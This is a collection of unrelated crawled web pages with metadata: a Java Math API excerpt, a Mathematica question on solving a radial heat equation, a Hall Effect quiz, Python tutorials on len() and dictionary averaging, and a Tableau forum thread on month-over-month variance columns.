smaller than positive zero.\nParameters:\n``` a``` - a `float` value.\n``` b``` - a `float` value.\nReturns:\nthe larger of `a` and `b`.\n\n### max\n\n```public static double max(double a,\ndouble b)```\nReturns the greater of two `double` values. If either value is `NaN`, then the result is `NaN`. Unlike the the numerical comparison operators, this method considers negative zero to be strictly smaller than positive zero.\nParameters:\n``` a``` - a `double` value.\n``` b``` - a `double` value.\nReturns:\nthe larger of `a` and `b`.\n\n### min\n\n```public static int min(int a,\nint b)```\nReturns the smaller of two `int` values.\nParameters:\n``` a``` - an `int` value.\n``` b``` - an `int` value.\nReturns:\nthe smaller of `a` and `b`.\n\n### min\n\n```public static long min(long a,\nlong b)```\nReturns the smaller of two `long` values.\nParameters:\n``` a``` - a `long` value.\n``` b``` - a `long` value.\nReturns:\nthe smaller of `a` and `b`.\n\n### min\n\n```public static float min(float a,\nfloat b)```\nReturns the smaller of two `float` values. If either value is `NaN`, then the result is `NaN`. Unlike the the numerical comparison operators, this method considers negative zero to be strictly smaller than positive zero.\nParameters:\n``` a``` - a `float` value.\n``` b``` - a `float` value.\nReturns:\nthe smaller of `a` and `b.`\n\n### min\n\n```public static double min(double a,\ndouble b)```\nReturns the smaller of two `double` values. If either value is `NaN`, then the result is `NaN`. Unlike the the numerical comparison operators, this method considers negative zero to be strictly smaller than positive zero.\nParameters:\n``` a``` - a `double` value.\n``` b``` - a `double` value.\nReturns:\nthe smaller of `a` and `b`.\n\nJava Platform 1.2\nBeta 4\n\nSubmit a bug or feature" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6590068,"math_prob":0.9641219,"size":11337,"snap":"2022-27-2022-33","text_gpt3_token_len":2895,"char_repetition_ratio":0.23444808,"word_repetition_ratio":0.4334698,"special_character_ratio":0.23595308,"punctuation_ratio":0.13132635,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995446,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-07T17:36:12Z\",\"WARC-Record-ID\":\"<urn:uuid:f20afc5c-6c77-4d9e-ae32-963299e003cd>\",\"Content-Length\":\"40567\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:81a43fd0-4956-49e0-86fb-b64aa5decfa5>\",\"WARC-Concurrent-To\":\"<urn:uuid:63e2db14-a536-4727-b9bb-65f91aef7d05>\",\"WARC-IP-Address\":\"128.208.1.193\",\"WARC-Target-URI\":\"https://courses.cs.washington.edu/courses/cse341/98au/java/jdk1.2beta4/docs/api/java/lang/Math.html\",\"WARC-Payload-Digest\":\"sha1:BF55T4ST6Z45FITXAWUMTFDRFQGVQYD4\",\"WARC-Block-Digest\":\"sha1:3PVVBHCUASWXQQLIPAIITAOCZPE7TKJV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104495692.77_warc_CC-MAIN-20220707154329-20220707184329-00242.warc.gz\"}"}
https://mathematica.stackexchange.com/questions/196921/ndsolve-gives-unexpected-results-when-using-the-method-of-lines
[ "# NDSolve gives unexpected results when using the method of lines\n\nI've been trying to solve the following PDE using the NDSolve function but it seems something is not working properly. The PDE is a the heat equation on polar coordinates and assuming angular simmetry:\n\n$$u_t (t, r) = \\alpha(r) \\frac{1}{r} \\partial_r (r u_r (t, r))$$\n\nwith boundary conditions $$u_t(t, r_{in}) = p$$ and $$u(t, r_{max}) = 0$$, and initial condition $$u(0,r)=0$$ for $$r\\in(r_{in}, r_{max})$$. The function $$\\alpha$$ represents the diffusion coefficient of the temperature in the media.\n\nThe idea is that $$r_{max}$$ is large enough so that $$u(t,r)$$ is alsmost flat and equal to zero close to $$r_{max}$$ through all the time window integrated.\n\nI have tried different $$\\alpha(r)$$ functions, which are\n\nalpStep[r_] :=If[r < rout, aA, aB];\nalpLin[r_] :=If[r < rout, aA + (aB - aA)(r-rin)/(rout - rin), aB];\nalpA[r_] := aA;\nalpB[r_] := aB;\n\n\n\nwhere $$r_{out}\\in(r_{ín},r_{max})$$ is a critical radius beyond which the diffusion remains constant.\n\nThe unexpected result is the following. I set aA > aB, and I integrate the different PDEs (with the different alp functions) by means of NDSolve. It turns out that the solution associated to the alpStep function takes values much more higher than the other functions, and I would expect it to be somewhere in between the solutions associated to the functions alpA and alpB. May be the problem is due to the discontinuous diffusion, but I can't see why.\n\nThe code is the following:\n\nrin = 0.05;\nrout = 0.15;\nrmax = 5;\np = 0.01;\ntend = 24*10;\n\naA = 0.01;\naB = 0.001;\nalpStep[r_] := If[r < rout, aA, aB];\nalpLin[r_] := If[r < rout, aA + (aB - aA) (r - rin)/(rout - rin), aB];\nalpA[r_] := aA;\nalpB[r_] := aB;\n\nopts = Method -> {\"MethodOfLines\",\n\"SpatialDiscretization\" -> {\"FiniteElement\",\n\"MeshOptions\" -> {\"MaxCellMeasure\" -> 0.001}}};\n\nWith[{u = u[t, r]}, eqn = alpStep[r] ((1/r) D[r D[u, r], r]) - D[u, t];\nrobinbc = NeumannValue[p*alpStep[rin], r == rin];\nbc = DirichletCondition[u == 0, r == rmax];\nic = u == 0 /. {t -> 0};]\nsolStepAB =\nNDSolveValue[{eqn == robinbc, bc, ic},\nu, {t, 0, tend}, {r, rin, rmax}, opts];\n\nWith[{u = u[t, r]}, eqn = alpLin[r] ((1/r) D[r D[u, r], r]) - D[u, t];\nrobinbc = NeumannValue[p*alpLin[rin], r == rin];\nbc = DirichletCondition[u == 0, r == rmax];\nic = u == 0 /. {t -> 0};]\nsolLinAB =\nNDSolveValue[{eqn == robinbc, bc, ic},\nu, {t, 0, tend}, {r, rin, rmax}, opts];\n\nWith[{u = u[t, r]}, eqn = alpA[r] ((1/r) D[r D[u, r], r]) - D[u, t];\nrobinbc = NeumannValue[p*alpA[rin], r == rin];\nbc = DirichletCondition[u == 0, r == rmax];\nic = u == 0 /. {t -> 0};]\nsolConA =\nNDSolveValue[{eqn == robinbc, bc, ic},\nu, {t, 0, tend}, {r, rin, rmax}, opts];\n\nWith[{u = u[t, r]}, eqn = alpB[r] ((1/r) D[r D[u, r], r]) - D[u, t];\nrobinbc = NeumannValue[p*alpB[rin], r == rin];\nbc = DirichletCondition[u == 0, r == rmax];\nic = u == 0 /. {t -> 0};]\nsolConB =\nNDSolveValue[{eqn == robinbc, bc, ic},\nu, {t, 0, tend}, {r, rin, rmax}, opts];\n\nGrid[{{\nPlot[{solStepAB[t, rin], solLinAB[t, rin], solConA[t, rin],\nsolConB[t, rin]}, {t, tend/1000, tend}],\nPlot[{solStepAB[t, rout], solLinAB[t, rout], solConA[t, rout],\nsolConB[t, rout]}, {t, tend/1000, tend}],\nPlot[{solStepAB[t, rout + (rout - rin)],\nsolLinAB[t, rout + (rout - rin)],\nsolConA[t, rout + (rout - rin)],\nsolConB[t, rout + (rout - rin)]}, {t, tend/1000, tend}]\n}}]\n\n\n\nThe picture with the temperature profiles for the different solutions alpStep (blue), alpLin (Orange), alpA (Green) and alpB (Red) at $$r = r_{in}, r_{out}, 2 r_{out} - r_{in}$$ from left to right is the following, where it can be seen that the profile associated to alpStep is much higher that the others:", null, "• I am not a 100% I understand your question but have a look at FEMDocumentation/tutorial/FiniteElementBestPractice#588198981 in the help system or online here Apr 25, 2019 at 5:52\n• Maybe similar to this Apr 25, 2019 at 6:23\n• Thanks for the reply, I'll take a look. Apr 25, 2019 at 13:44\n• Were you able to figure this out? Apr 29, 2019 at 5:16\n\nYes! The problem was that some information was missing in the problem I stated above. Specifically, due to the discontinuity of the function $$\\alpha$$ at $$r_{out}$$, the solution fails to be differentiable at that point, and multiple solutions exist. NDSolve gives one of these following some criterium related to fluxes (the heat flux at one side of the discontinuity has to be equal to the heat flux at the other side). Notice that the flux depends on the thermal conductivity $$k$$, which is not explicitly stated in the problem above. In general the thermal diffusivity $$\\alpha$$ is equal to the conductivity $$k$$ over the heat capacity $$c$$ (i.e. $$\\alpha = k / c$$). In order to use properly the NDSolve function in this case (in the sense that the continuity of the flux is preserved at $$r_{out}$$) one should avoid working with diffusion coefficient and use $$k$$ and $$c$$ instead, that is one should write\nWith[{u = u[t, r]}, eqn = k[r] ((1/r) D[r D[u, r], r]) - c[r] D[u, t];" ]
[ null, "https://i.stack.imgur.com/Uz67U.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7413816,"math_prob":0.9995548,"size":3671,"snap":"2022-27-2022-33","text_gpt3_token_len":1317,"char_repetition_ratio":0.102536134,"word_repetition_ratio":0.27154472,"special_character_ratio":0.38082266,"punctuation_ratio":0.2326139,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999639,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-18T04:28:53Z\",\"WARC-Record-ID\":\"<urn:uuid:bbd52c5e-8103-48ec-9f9c-ba4d0dbb0b1a>\",\"Content-Length\":\"231899\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f29117a7-badb-4114-aaca-8da2b297a54a>\",\"WARC-Concurrent-To\":\"<urn:uuid:15a8fa2d-f045-4f49-877a-3535a03d91a1>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://mathematica.stackexchange.com/questions/196921/ndsolve-gives-unexpected-results-when-using-the-method-of-lines\",\"WARC-Payload-Digest\":\"sha1:6X32I4N5SW3FJP6KINQM2TV3YCBWKQE2\",\"WARC-Block-Digest\":\"sha1:66X5LQWKJWDOQDAQG7XJUF7ND36SSBG5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573163.7_warc_CC-MAIN-20220818033705-20220818063705-00265.warc.gz\"}"}
https://www.sanfoundry.com/electronic-devices-circuits-questions-answers-hall-effect/
[ "# Electronic Devices and Circuits Questions and Answers – The Hall Effect\n\nThis set of Electronic Devices and Circuits Multiple Choice Questions & Answers (MCQs) focuses on “The Hall Effect”.\n\n1. In the Hall Effect, the directions of electric field and magnetic field are parallel to each other.\nThe above statement is\na) True\nb) False\n\nExplanation: To make Lorentz force into the effect, the electric field and magnetic field should be perpendicular to each other.\n\n2. Which of the following parameters can’t be found with Hall Effect?\na) Polarity\nb) Conductivity\nc) Carrier concentration\nd) Area of the device\n\nExplanation: The Hall Effect is used for finding the whether the semiconductor is of n-type or p-type, mobility, conductivity and the carrier concentration.\n\n3. In the Hall Effect, the electric field is in x direction and the velocity is in y direction. What is the direction of the magnetic field?\na) X\nb) Y\nc) Z\nd) XY plane\n\nExplanation: The Hall Effect satisfies the Lorentz’s Force which is\nE=vxB\nSo, the direction of the velocity, electric field and magnetic field should be perpendicular to each other.\n\n4. What is the velocity when the electric field is 5V/m and the magnetic field is 5A/m?\na) 1m/s\nb) 25m/s\nc) 0.2m/s\nd) 0.125m/s\n\nExplanation: E=vxB\nv=E/B\n=5/5\n=1m/s.\n\n5. Calculate the hall voltage when the Electric Field is 5V/m and height of the semiconductor is 2cm.\na) 10V\nb) 1V\nc) 0.1V\nd) 0.01V\n\nExplanation: Vh=E*d\n=5*2/100\n=0.1V.\n\n6. Which of the following formulae doesn’t account for correct expression for J?\na) ρv\nb) I/wd\nc) σE\nd) µH\n\nExplanation: B=µH\nSo, option µH is correct option.\n\n7. Calculate the Hall voltage when B=5A/m, I=2A, w=5cm and n=1020.\na) 3.125V\nb) 0.3125V\nc) 0.02V\nd) 0.002V\n\nExplanation: Vh=BI/wρ\n=5=2/ (5*10-2*105*1.6*10-19)\n=0.002V.\n\n8. Calculate the Hall Effect coefficient when number of electrons in a semiconductor is 1020.\na) 0.625\nb) 0.0625\nc) 6.25\nd) 62.5\n\nExplanation: R=1/ρ\n=1/(1.6*10-19*1020)\n=0.0625.\n\n9. What is the conductivity when the Hall Effect coefficient is 5 and mobility is 5cm2 /s.\na) 100 S/m\nb) 10 S/m\nc) 0.0001S/m\nd) 0.01 S/m\n\nExplanation: µ=σR\nσ =µ/R\n=5*10-4/5\n=0.0001 S/m.\n\n10. In Hall Effect, the electric field applied is perpendicular to both current and magnetic field?\na) True\nb) False\n\nExplanation: In Hall Effect, the electric field is perpendicular to both current and magnetic field so that the force due to magnetic field can be balanced by the electric field or vice versa.\n\nSanfoundry Global Education & Learning Series – Electronic Devices and Circuits.\n\nTo practice all areas of Electronic Devices and Circuits, here is complete set of 1000+ Multiple Choice Questions and Answers.", null, "" ]
[ null, "data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20150%20150%22%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6991632,"math_prob":0.9766574,"size":2697,"snap":"2023-40-2023-50","text_gpt3_token_len":837,"char_repetition_ratio":0.16747122,"word_repetition_ratio":0.08888889,"special_character_ratio":0.29477197,"punctuation_ratio":0.12790698,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9960417,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T05:15:52Z\",\"WARC-Record-ID\":\"<urn:uuid:3ac8bbb3-d59e-445d-b5fe-add20dee813d>\",\"Content-Length\":\"176865\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f15968c6-514c-4d9b-b739-fc64cf83e69d>\",\"WARC-Concurrent-To\":\"<urn:uuid:bf8ac72b-b3ba-41b9-a38a-5cb5da33d5b8>\",\"WARC-IP-Address\":\"172.67.82.182\",\"WARC-Target-URI\":\"https://www.sanfoundry.com/electronic-devices-circuits-questions-answers-hall-effect/\",\"WARC-Payload-Digest\":\"sha1:IMPHTC6OBOIHNT367D3WBRO6C7BNELBC\",\"WARC-Block-Digest\":\"sha1:RX234L3CV2NYRPTE2DAAZDQ4KQ66D47A\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679101195.85_warc_CC-MAIN-20231210025335-20231210055335-00316.warc.gz\"}"}
https://community.tableau.com/thread/222974
[ "10 Replies Latest reply on Dec 22, 2016 10:36 AM by Shinichiro Murakami\n\nVariances between standard and current month in a dynamic report\n\nHi All,\n\nPlease help!! I am sure it supposed to be simple...but it is taking me ages to try and figure this out!\n\nI am trying to create a report whereby I show the cost per piece over the last 12 months - my report is dynamic so the user can change the current month and thus the preceding 11 months before.\n\nThe problem I am encountering is that I am trying to show a variance column based on the \"current month\" and the Dec of the previous year.\n\nI have taken the following steps:\n\n1) I have created the formula where [Date Control] is my parameter to select the month.\n\n*Current Month Cost Per Unit*:                           IF ([Date]) = [Date Control] THEN [Cost Per Unit] ELSE 0 END\n\n*Last Month Last Year (LM LY) Cost Per Unit*:  IF ([Date]) = [LM LY] THEN [Cost Per Unit] ELSE 0 END\n\n* Variance Calc*:                                                 [LM LY Cost Per Unit] - [Current Month Cost Per Unit]\n\n2) I have added the variance calc to my rows as a discrete value - The problem here is that rather than each part sitting on one line, when I add this calculation, it sits on three lines - one line has the \"current month\" cost, one the Dec'15 cost and the other has the remaining months. I then get a variance for both the Dec'15 row and the current month row - summed up, the variance would be correct but the current way it is displayed is not helpful:", null, "(This is what it looked like before I added the variance calc):", null, "3) I thought I had a solution - to duplicate the report and create a formula firstly to only show the previous dec and the current month. This would then enable me to create the below formula:\n\nSUM([Cost Per Unit]) - LOOKUP(ZN(SUM([Cost Per Unit])), -1)\n\nHowever, although the calculation is then correct (i.e. it actually subtracts the values between Dec15 and Nov16, it still shows on two lines and shows a \"Null\":", null, "The report I am trying to produce is very long, with many part costs, and so the idea of a second worksheet may prove difficult when lining it up in the Dashboard...I have already noticed that the order doesn't always stay the same etc, and I also wouldn't know how to hide the Dec month in the second worksheet (as it will already be one of the months showing in the first worksheet).\n\nSo my queries are as follows:\n\n1) How would you go about trying to present this long report with variance column for current month versus previous Dec (I will need to present the months in chronological order, so the previous Dec will never be in the same position compared to the current month)?\n\n2) How can I display just one row for each part so that comparison is easy and the variance calculates properly?\n\n2) How can I get the variance column to sit as the last column in the report?\n\n3) How can I apply a different colour only to the variance column?\n\nI'd be so grateful for any help you can offer, this is starting to give me a headache!\n\nNicola\n\n• 1. Re: Variances between standard and current month in a dynamic report\n\nHi Nicola,\n\nThank you for describing the issue very in detail, but to be honest, I hesitate to read thru your question without seeing your data.\n\nThat's really in vain, in case of without data.\n\nPackaged workbooks and flows: when, why, how\n\nThanks,\n\nShin\n\n• 2. Re: Variances between standard and current month in a dynamic report\n\nHi Shin,\n\nI have tried to replicate what I am doing with the dummy Superstore data...but unfortunately there seems to be something odd with my variance formula...it is only working for some of the Product IDs - the rest it just returns zero. Perhaps you could show me how you might go about creating a variance column between the previous Dec and the current month and I will see if I can replicate it in my own data - as you say, this might be an easier way than answering my query above!\n\nThanks a lot,\n\nNicola\n\n• 3. Re: Variances between standard and current month in a dynamic report\n\nNicala,\n\nTo be honest, to meet all of you request is quite troublesome, in other words, very difficult for beginners.\n\nBut anyways, I put some solutions here.\n\nHere are two versions, with variance different(Version 2) color and Not(version 1)\n\nversion 1 is easier and less steps, but still you need time to digest it.", null, "[Month Filter]\n\nif attr(datetrunc('month',[Order Date]))=attr(datetrunc('month',[Control Month]))\n\nor\n\nthen \"show\" else \"hide\" end\n\n[Variance Current - Dec]  <==  as Discrete\n\nint(window_sum(ZN(sum(if datetrunc('month',[Order Date])=datetrunc('month',[Control Month])\n\nthen [Sales] end)))\n\n-\n\nthen [Sales] end))))", null, "", null, "version 2 :  Detail concept is here, it's requires around 100 steps by itself\n\nSuch a simple view, it required 100 steps!! - Having Multiple KPIs - - Still Struggling with Excel ?? <Tableau's Room>", null, "[Last December Sales]\n\nthen [Sales] end)))\n\n[This month Sales]\n\nint(window_sum(ZN(sum(if datetrunc('month',[Order Date])=datetrunc('month',[Control Month])\n\nthen [Sales] end))))", null, "Thanks,\n\nShin\n\n• 4. Re: Variances between standard and current month in a dynamic report\n\nHi Shin,\n\nThanks a lot for your reply. I will work through it today and see if I can make it work...may I ask though - if I want to display all the other months (previous 11 months + current month)...will it still work?\n\nThanks\n\nNicola\n\n• 5. Re: Variances between standard and current month in a dynamic report\n\nIn version two, you need add column X 2 fields. I personally persuade better give up coloring variance.\n\nYou might use dashboard instead.  Though, using dashboard has different constraints and need to see detail.\n\nThe final goal is to balance between \"workload and durability\" and \"interactive function and visibility\".\n\nThanks,\n\nShin\n\n• 6. Re: Variances between standard and current month in a dynamic report\n\nHi Shin,\n\nThanks for taking the time to explain all this.\n\nOne of the issues with the standard version is that the Variance column still appears first - ideally I should like to see this last - after the current month. I think I can get the order to change for the colour one - so I will try to replicate this, I have worked with something previously you suggested using this approach so hopefully I can get my head around it.\n\nCan you help me understand though what the \"INT\" and \"Window_Sum\" are doing in your formula? The rest of the formula makes sense but I can't quite understand this part.\n\nint(window_sum(ZN(sum(if datetrunc('month',[Order Date])=datetrunc('month',[Control Month])\n\nthen [Sales] end)))\n\n-\n\nthen [Sales] end))))\n\nI actually was playing around yesterday and came up with the attached (with only 3 months as an example), however, the problem here is that because I have to create a calculated field for all the 12 months and because it is dynamic...I can't name the columns with the month name - is there anyway I can change this so it picks up the correct month name? Without the month names, I can't share this with my end users.\n\nIn fact...I think I will encounter the same issue with regards to the months names in the colour version?\n\nThanks\n\nNicola\n\n• 7. Re: Variances between standard and current month in a dynamic report\n\nI'm not sure I remember correctly, but maybe ,window_sum is used to calculate total regardless of dimensions.  Standard sum's case, that calculation becomes null because of dimensions settings.\n\nInt is changing decimal to whole number.  To use numbers as dimensions, decimal brings trouble.\n\nAnd you are right, bringing Month Name is another challenge which I don't have immediate answer right now.\n\nThanks,\n\nShin\n\n• 8. Re: Variances between standard and current month in a dynamic report\n\nThere are \"1\" value difference , maybe 'round' is better than 'Int', BTW.\n\nThanks,\n\nShin\n\n• 9. Re: Variances between standard and current month in a dynamic report\n\nGive me one more try.\n\nKind of crazy approach but might be providing some hints for other case.", null, "Using standard method\n\n[Variance Current - Dec (continuous)2]  <== Only shows variance on \"Control Month\"\n\nif  attr(datetrunc('month',[Order Date]))= datetrunc('month',[Control Month]) then\n\nint(window_sum(ZN(sum(if datetrunc('month',[Order Date])=datetrunc('month',[Control Month])\n\nthen [Sales] end)))\n\n-\n\nthen [Sales] end))))\n\nend\n\n[Variance Current - Dec (continuous)2 Negative]  <== Only shows values if negative with \"|\" text separator\n\nif [Variance Current - Dec (continuous)2]<0 then \"| \"+str([Variance Current - Dec (continuous)2]) end\n\n[Variance Current - Dec (continuous)2 positive] <== Only shows values if positive with \"|\" text separator\n\nif [Variance Current - Dec (continuous)2]>=0 then \"| \"+str([Variance Current - Dec (continuous)2]) end", null, "That's it.\n\nThanks,\n\nShin\n\n• 10. Re: Variances between standard and current month in a dynamic report\n\nAnd one more option to show the variance to the right end.\n\nOnly available when  the latest month > parameter control month", null, "if DATEDIFF('month', [Order Date], [Control Month]) = -1\n\nthen \"Variance\" else datename('month', [Order Date]) end\n\n[Relative Date +1]\n\nIF\n\nDATEDIFF('month', [Order Date], #2014-12-01#) = 0 OR\n\nDATEDIFF('month', [Order Date], [Control Month]) <11 and\n\nDATEDIFF('month', [Order Date], [Control Month]) >= -1\n\nTHEN \"Show\" ELSE \"Hide\" END\n\n[Variance Current - Dec (continuous)2]\n\nint(window_sum(ZN(sum(if datetrunc('month',[Order Date])=datetrunc('month',[Control Month])\n\nthen [Sales] end)))\n\n-\n\nthen [Sales] end))))\n\nend\n\n[Sales SM]\n\nif attr([Header Date])<>\"Variance\" then sum([Sales]) end\n\n[Variance Current - Dec (continuous)2 Negative]\n\nif attr([Header Date]) =\"Variance\" and [Variance Current - Dec (continuous)2]<0 then [Variance Current - Dec (continuous)2] end\n\n[Variance Current - Dec (continuous)2 positive]\n\nif attr([Header Date])=\"Variance\" and [Variance Current - Dec (continuous)2]>=0 then [Variance Current - Dec (continuous)2] end\n\nThanks,\n\nShin" ]
[ null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-561585-212238/pastedImage_3.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-561585-212239/pastedImage_7.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-561585-212207/pastedImage_0.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-562406-212849/pastedImage_0.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-562406-212850/435-450/pastedImage_3.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-562406-212851/499-283/pastedImage_4.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-562406-212852/495-289/pastedImage_8.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-562406-212854/522-270/pastedImage_11.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-563216-213293/581-261/pastedImage_0.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-563216-213294/490-195/pastedImage_5.png", null, "https://community.tableau.com/servlet/JiveServlet/downloadImage/2-563277-213738/527-225/pastedImage_0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93138546,"math_prob":0.8738502,"size":2897,"snap":"2019-26-2019-30","text_gpt3_token_len":668,"char_repetition_ratio":0.13930176,"word_repetition_ratio":0.018348623,"special_character_ratio":0.24266483,"punctuation_ratio":0.07757167,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9835484,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-25T07:02:08Z\",\"WARC-Record-ID\":\"<urn:uuid:8ee4fac8-063c-4679-a0a3-c26207ae0824>\",\"Content-Length\":\"154317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fd0a563e-8121-4794-b31e-f3577c0af319>\",\"WARC-Concurrent-To\":\"<urn:uuid:bac6040a-665b-4e57-867f-37b1ded9dcec>\",\"WARC-IP-Address\":\"204.93.79.205\",\"WARC-Target-URI\":\"https://community.tableau.com/thread/222974\",\"WARC-Payload-Digest\":\"sha1:HTKFRJI3OTR4AYBJRIBLYXYLCIN2YI5C\",\"WARC-Block-Digest\":\"sha1:27FLG4X3AGDB6OXHXGVX4A7K7XIIDEK3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627999800.5_warc_CC-MAIN-20190625051950-20190625073950-00458.warc.gz\"}"}
https://www.datasciencemadesimple.com/len-function-python-string-length-python/
[ "# len() function in python – Get string length in python\n\nlen() function in python returns the length of the string. lets see an example on how to get length of a string in python with the help of length function – len().\n\nSyntax for len() function in python – string length function :\n\nlen( str )\n\n#### Example of len() function in python for strings :\n\nLength function in python –len()  returns the length of the string in python, lets see with an example\n\n```str = \"Beauty of democracy!!\";\nprint \"Length of the string is : \", len(str)\n```\n\nThe output will be\n\nLength of the string is: 21\n\n#### Example of len() Function for list in python – number of elements in the list:\n\nLength function – len()  also returns the number of elements in the list. Lets see with an example\n\n```List1=[456,\"Example\",\"decode\",\"435hyud\"]\nList2=[\"Democracy\",\"Development\"]\n\nprint \"Length of the first List : \", len(List1)\nprint \"Length of the second List : \", len(List2)\n```\n\nThe output will be\n\nLength of the first List : 4\nLength of the second List : 2\n\nlength of the string in columns of dataframe in python can be referred here" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.68612134,"math_prob":0.9499348,"size":1045,"snap":"2020-45-2020-50","text_gpt3_token_len":248,"char_repetition_ratio":0.20557156,"word_repetition_ratio":0.113513514,"special_character_ratio":0.26698565,"punctuation_ratio":0.11707317,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98734266,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-27T10:57:02Z\",\"WARC-Record-ID\":\"<urn:uuid:bbc44081-c1c6-4c05-bf4b-02d9676760d6>\",\"Content-Length\":\"52348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1e64ef47-75bc-4184-bf81-c5b764bc5674>\",\"WARC-Concurrent-To\":\"<urn:uuid:621d03ac-5e83-4edf-99fb-8d45e02f4561>\",\"WARC-IP-Address\":\"104.27.148.144\",\"WARC-Target-URI\":\"https://www.datasciencemadesimple.com/len-function-python-string-length-python/\",\"WARC-Payload-Digest\":\"sha1:MX6T3T2YCFKFXXX7O7IFGFHFHO2A2GHO\",\"WARC-Block-Digest\":\"sha1:OTUIRE6C4TLN66ROD55CNRSSXVEMDYHI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141191692.20_warc_CC-MAIN-20201127103102-20201127133102-00210.warc.gz\"}"}
https://www.w3resource.com/python-exercises/dictionary/python-data-type-dictionary-exercise-37.php
[ " Python: Replace dictionary values with their average - w3resource\n\n# Python Exercise: Replace dictionary values with their average\n\n## Python dictionary: Exercise-37 with Solution\n\nWrite a Python program to replace dictionary values with their average.\n\nSample Solution:-\n\nPython Code:\n\n``````def sum_math_v_vi_average(list_of_dicts):\nfor d in list_of_dicts:\nn1 = d.pop('V')\nn2 = d.pop('VI')\nd['V+VI'] = (n1 + n2)/2\nreturn list_of_dicts\nstudent_details= [\n{'id' : 1, 'subject' : 'math', 'V' : 70, 'VI' : 82},\n{'id' : 2, 'subject' : 'math', 'V' : 73, 'VI' : 74},\n{'id' : 3, 'subject' : 'math', 'V' : 75, 'VI' : 86}\n]\nprint(sum_math_v_vi_average(student_details))\n```\n```\n\nSample Output:\n\n```[{'subject': 'math', 'id': 1, 'V+VI': 76.0}, {'subject': 'math', 'id': 2, 'V+VI': 73.5}, {'subject': 'math', '\nid': 3, 'V+VI': 80.5}]\n```\n\n## Visualize Python code execution:\n\nThe following tool visualize what the computer is doing step-by-step as it executes the said program:\n\nPython Code Editor:\n\nHave another way to solve this solution? Contribute your code (and comments) through Disqus.\n\nWhat is the difficulty level of this exercise?\n\n\n\nInviting useful, relevant, well-written and unique guest posts" ]
[ null ]
